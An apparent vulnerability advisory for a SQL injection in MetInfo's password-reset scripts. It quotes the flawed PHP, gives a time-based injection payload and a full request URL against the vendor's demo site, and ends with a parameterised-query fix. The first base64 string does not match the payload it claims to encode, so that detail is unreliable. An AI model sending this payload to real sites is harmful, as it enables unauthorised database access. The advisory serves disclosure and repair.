MetInfo enterprise website management system SQL injection vulnerability

2013-06-30T00:00:00
ID MYHACK58:62201339448
Type myhack58
Reporter applychen
Modified 2013-06-30T00:00:00

Description

Brief description:

MetInfo enterprise website management system SQL injection vulnerability

Detailed description:

The member/getpassword.php and admin/admin/getpassword.php files:

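if($p){
    // $p comes from the request; its decoded value is split on '.'
    $array = explode('.', base64_decode($p));
    // $array[0] is concatenated into the query string as-is
    $sql="SELECT * FROM $met_admin_table WHERE admin_id='".$array[0]."'";
    $sqlarray = $db->get_one($sql);
    // ...
}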

The value of base64_decode($p) is split with explode() and assigned to the $array array. $array[0] is then placed directly into the SQL query, which is where the injection occurs.

Proof of vulnerability:

The base64 encoding of 1'or(select sleep(5))#.1 is MSdvcihzZWxlY3Qgc2xlZXAoMTApKSMumq==

Then request:

http://demo.metinfo.cn/member/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNSkpIy4x

Repair solution:

Filter $array[0].
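
One way to apply this fix, shown as an added example that is not MetInfo's code or the reporter's: the decoded first field is checked against an allowlist and then passed as a bound parameter instead of being concatenated. It assumes PDO with the SQLite driver; the function name, the literal table name, the admin_email column, the character allowlist and the in-memory data are all constructed for illustration.

```php
<?php
// Added example, not MetInfo's own code. Assumptions: PDO is available;
// the table layout, the allowlist and the sample rows are constructed.

function find_admin_by_token(PDO $pdo, string $p): ?array
{
    // Strict mode returns false on characters outside the base64 alphabet.
    $decoded = base64_decode($p, true);
    if ($decoded === false) {
        return null;
    }

    // Same split as the vulnerable code: first field is the account id.
    $parts = explode('.', $decoded);
    $adminId = $parts[0];

    // "Filter $array[0]": accept only characters expected in an account id
    // (hypothetical rule; adjust to the real account-name policy).
    if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $adminId)) {
        return null;
    }

    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT * FROM met_admin_table WHERE admin_id = :id');
    $stmt->execute([':id' => $adminId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory table standing in for $met_admin_table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE met_admin_table (admin_id TEXT PRIMARY KEY, admin_email TEXT)');
$pdo->exec("INSERT INTO met_admin_table VALUES ('admin', 'admin@example.test')");

$samples = [
    'legitimate token'      => base64_encode('admin.1'),
    'value from the report' => 'MSdvcihzZWxlY3Qgc2xlZXAoNSkpIy4x',
    'not base64'            => '%%%',
];
foreach ($samples as $label => $p) {
    $row = find_admin_by_token($pdo, $p);
    echo $label, ': ', $row === null ? 'rejected' : 'found ' . $row['admin_id'], PHP_EOL;
}
```

The bound parameter alone stops the injection; the allowlist additionally rejects malformed ids before any query runs, which keeps them out of the database layer and makes rejected requests easy to log.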